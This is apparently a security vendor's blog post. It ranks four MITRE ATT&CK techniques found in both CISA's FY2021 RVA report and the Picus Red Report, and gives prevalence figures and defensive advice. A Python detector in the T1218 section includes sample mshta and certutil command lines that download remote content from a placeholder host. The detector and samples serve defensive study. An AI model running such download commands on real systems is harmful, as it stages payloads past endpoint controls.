The Top 4 MITRE ATT&CK Techniques from CISA’s RVA Report and Picus Red Report
In 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) performed 112 Risk and Vulnerability Assessments (RVA) of stakeholders across multiple industries to identify vulnerabilities that adversaries could exploit [1]. CISA's RVA teams map the findings of each RVA to the MITRE ATT&CK® framework. Leveraging this data, CISA determined the top 3 most successfully utilized ATT&CK techniques in each tactic [2]. Techniques that RVA teams employ successfully can be employed just as successfully by adversaries.
Utilizing a different methodology, Picus Labs annually publishes the 10 most prevalent ATT&CK techniques used by adversaries in malware. Following the release of CISA's FY21 RVA analysis, Picus Labs identified the four MITRE ATT&CK techniques that appear both in the FY2021 RVA results and in the Top 10 Most Prevalent MITRE ATT&CK techniques of the Picus Red Report 2021.
Organizations of all sizes should prioritize these four ATT&CK techniques to enhance their cybersecurity posture: they were the techniques most successfully utilized by CISA's RVA teams in assessed organizations, and they were the techniques most used by adversaries in their malware.
In this blog post, we explain the four ATT&CK techniques shared by the CISA RVA and the Picus Red Report and show which adversary techniques security teams should focus their defensive security operations on.
CISA’s Risk and Vulnerability Assessments (RVA) Report
The Risk and Vulnerability Assessment (RVA) Report is an annual report published by CISA. The data presented in the CISA RVA Report is collected from various critical government and infrastructure organizations. CISA RVA teams organize and run tests and evaluations such as penetration testing, social engineering, configuration reviews, and detection analysis. The results of these tests and evaluations are combined and mapped to the National Vulnerability Database (NIST NVD) and MITRE ATT&CK so that organizations can take action to improve their cyber defenses.
The CISA RVA Report for Fiscal Year 2021 (FY2021) was published in May 2022. The report gathers all the vulnerabilities discovered in RVAs over the year and maps them to the MITRE ATT&CK framework. The report shows the most common vulnerabilities found for each stage of the attack path.
Picus Red Report
Picus Red Report is an annual report based on the research conducted by Picus Labs. In 2021, Picus Labs analyzed more than 200,000 malware samples used by threat actors and determined the 10 most prevalent ATT&CK techniques. 89% of the techniques and sub-techniques listed in the Picus Red Report are also reported as the most successful techniques in the CISA RVA Report.
The Top 4 MITRE ATT&CK Techniques Identified from the CISA’s RVA Analysis and Picus Red Report
Security teams should prioritize and focus on the ATT&CK techniques they are both vulnerable to and most used by attackers. Since the following four techniques are the most successfully utilized techniques by RVA teams (CISA FY2021 RVA analysis) and the most prevalent techniques used by adversaries (Picus Red Report), they are more likely to be successfully employed by attackers in a cyberattack campaign.
1. MITRE ATT&CK T1059 Command and Scripting Interpreter
T1059 Command and Scripting Interpreter is an Execution technique that cyber threat actors use to run commands, scripts, and binaries on the victim system. This technique was the most prevalent adversary technique in the Picus Red Report 2021 and the most common vulnerability under the TA0002 Execution tactic of the CISA RVA FY2021 Report.
26% of malware reported in the Picus Red Report uses the T1059 Command and Scripting Interpreter technique. On the exploitability side, CISA's RVA teams successfully employed the T1059 Command and Scripting Interpreter technique for Execution in 15.1% of assessed organizations.
| Technique Name | Execution |
| --- | --- |
| T1059.001 PowerShell | 12.7% |
| T1059.002 AppleScript | 0.3% |
| T1059.003 Windows Command Shell | 2.1% |
For more detailed information, you can check our blog post on the T1059 Command and Scripting Interpreter technique.
2. MITRE ATT&CK T1055 Process Injection
T1055 Process Injection is categorized under both the Privilege Escalation and Defense Evasion tactics in the MITRE ATT&CK Framework. Cyber threat actors use the T1055 Process Injection technique to stay hidden and to elevate their privileges on the victim system.
21% of malware reported in the Picus Red Report uses the T1055 Process Injection technique. On the exploitability side, CISA’s RVA teams successfully employed the T1055 Process Injection technique for Privilege Escalation in 19.7% of assessed organizations; for Defense Evasion in 12.5% of assessed organizations.
| Technique Name | Privilege Escalation | Defense Evasion |
| --- | --- | --- |
| T1055 Process Injection | 19.7% | 10.4% |
| T1055.012 Process Hollowing | - | 2.1% |
Please check our blog post for more detailed information on this technique.
3. MITRE ATT&CK T1218 Signed Binary Proxy Execution
T1218 Signed Binary Proxy Execution is a Defense Evasion technique in the MITRE ATT&CK framework that lets adversaries bypass process-based and signature-based controls on Windows systems. Signed binaries are executables that carry trusted digital certificates. Because operating systems and many security tools trust these binaries by default, they are often allowed to run with fewer restrictions. Adversaries take advantage of this trust by launching malicious payloads through known, signed Windows utilities so that their activity blends in with normal administration.
Common examples include regsvr32.exe and rundll32.exe to load and run malicious code, mshta.exe to execute HTA or script content fetched from remote locations, installutil.exe and odbcconf.exe to proxy execution of attacker-supplied assemblies, and certutil.exe to download, decode, or stage payloads. These tools are present on most endpoints and are frequently used for legitimate tasks, which makes blanket blocking risky and signature-only detections unreliable. Attackers chain this technique with initial access, privilege escalation, and lateral movement to persist quietly and evade endpoint controls.
Defenders can reduce risk by focusing on behavior and context rather than file trust alone. Enable command-line auditing and process creation logs, collect Sysmon events, and alert on suspicious parent-child relationships, unusual command-line flags, remote script execution, and signed binaries spawning network connections or writing to user-writable directories. Apply application control to restrict high-risk signed binaries, enforce PowerShell Constrained Language Mode, and enable Attack Surface Reduction rules that block or warn on abuse of built-in tools. Segment high-value systems, require multi-factor authentication for administrative access, and continuously validate detections with real-world simulations of T1218 sub-techniques so you can confirm coverage and close gaps before an intrusion progresses.
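The behavioral indicators listed above can be expressed as simple rules over process creation telemetry. The following is an added example written for this post (not Picus code and not a CISA artifact) that scores constructed Sysmon-style events for the signed proxy binaries named here; the event fields, the rule names, and the sample command lines are assumptions for illustration.

```python
import re
from dataclasses import dataclass

# Signed Windows utilities the post names as common T1218 proxies.
PROXY_BINARIES = {"mshta.exe", "regsvr32.exe", "rundll32.exe",
                  "installutil.exe", "odbcconf.exe", "certutil.exe"}
# Document handlers that rarely have a legitimate reason to spawn those utilities.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
REMOTE_RE = re.compile(r"https?://|\\\\[\w.-]+\\", re.I)            # URL or UNC share in the command line
USER_WRITABLE_RE = re.compile(r"\\users\\[^\\]+\\(appdata|downloads|desktop)\\|\\programdata\\", re.I)

@dataclass
class ProcessEvent:           # the three Sysmon Event ID 1 fields these rules need
    image: str
    parent_image: str
    command_line: str

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def triage(ev: ProcessEvent) -> list[str]:
    """Return the behavioural indicators that fire for one event; [] means no rule matched."""
    if basename(ev.image) not in PROXY_BINARIES:
        return []                       # only the signed proxy binaries are in scope here
    hits = []
    if basename(ev.parent_image) in OFFICE_PARENTS:
        hits.append("office-parent")
    if REMOTE_RE.search(ev.command_line):
        hits.append("remote-content")
    if USER_WRITABLE_RE.search(ev.command_line):
        hits.append("user-writable-path")
    if basename(ev.image) == "certutil.exe" and "-urlcache" in ev.command_line.lower():
        hits.append("certutil-download")
    return hits

def flagged(events: list[ProcessEvent]) -> list[tuple[str, list[str]]]:
    """Keep only events with at least one indicator, paired with what fired."""
    return [(basename(e.image), triage(e)) for e in events if triage(e)]

# Constructed sample events (not real telemetry); hosts use the reserved .invalid TLD.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\mshta.exe", r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
                 r"mshta.exe http://example.invalid/update.hta"),
    ProcessEvent(r"C:\Windows\System32\rundll32.exe", r"C:\Windows\explorer.exe",
                 r"rundll32.exe C:\Users\alice\AppData\Local\Temp\helper.dll,Start"),
    ProcessEvent(r"C:\Windows\System32\rundll32.exe", r"C:\Windows\System32\svchost.exe",
                 r"rundll32.exe shell32.dll,Control_RunDLL desk.cpl"),   # routine control-panel launch, no rule fires
    ProcessEvent(r"C:\Windows\System32\certutil.exe", r"C:\Windows\System32\cmd.exe",
                 r"certutil.exe -urlcache -split -f http://example.invalid/a.txt C:\Users\alice\Downloads\a.txt"),
]

if __name__ == "__main__":
    for name, hits in flagged(SAMPLE_EVENTS):
        print(f"{name}: {', '.join(hits)}")
```

The third sample shows why the rules key on context rather than the binary name: rundll32.exe launched from a service host with a built-in control-panel argument produces no finding, while the same binary loading a DLL from a user-writable temp directory does.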
16% of malware reported in the Picus Red Report uses the T1218 Signed Binary Proxy Execution technique. On the exploitability side, CISA’s RVA teams successfully employed the T1218 Signed Binary Proxy Execution technique for Defense Evasion in 22.7% of assessed organizations; for Execution in 22% of assessed organizations.
| Technique Name | Defense Evasion | Execution |
| --- | --- | --- |
| T1218.001 Compiled HTML File | 1.4% | 1.4% |
| T1218.002 Control Panel | 0.7% | 0.7% |
| T1218.003 CMSTP | 0.3% | 0.3% |
| T1218.004 InstallUtil | 0.3% | 0.3% |
| T1218.005 Mshta | 12.7% | 13.4% |
| T1218.010 Regsvr32 | 1.4% | 1.4% |
| T1218.011 Rundll32 | 5.2% | 5.2% |
In version 11 of the MITRE ATT&CK Framework, the technique was renamed T1218 System Binary Proxy Execution. For more detailed information, you can check our blog post on the T1218 Signed Binary Proxy Execution technique.
4. MITRE ATT&CK T1003 OS Credential Dumping
T1003 OS Credential Dumping is a Credential Access technique that adversaries use to obtain login credentials, such as account names and passwords, from the victim system.
14% of malware reported in the Picus Red Report uses the T1003 OS Credential Dumping technique. On the exploitability side, CISA’s RVA teams successfully employed the T1003 OS Credential Dumping technique for Credential Access in 13.1% of assessed organizations.
For more detailed information, please check our blog post on OS Credential Dumping.
Conclusion
Although they are independent, the CISA RVA Report and the Picus Red Report approach the global cyber threat landscape from different perspectives. While the CISA RVA reports on exploitable vulnerabilities in organizations' networks, the Red Report focuses on the techniques most commonly used by adversaries.
According to this study, the top 4 MITRE ATT&CK techniques that are most successfully utilized by red teamers and most used by adversaries are:
1. T1059 Command and Scripting Interpreter
2. T1055 Process Injection
3. T1218 Signed Binary Proxy Execution
4. T1003 OS Credential Dumping
Unsurprisingly, both reports draw very similar conclusions. The more common a weakness is across target networks, the more benefit adversaries gain from the techniques that exploit it. Therefore, we can say that the CISA RVA Report and the Picus Red Report are two faces of the same coin.
References
[1] https://www.cisa.gov/sites/default/files/publications/FY21-RVA-Analysis_508c.pdf
[2] https://www.cisa.gov/sites/default/files/publications/RVA%20INFOGRAPHIC_508c.pdf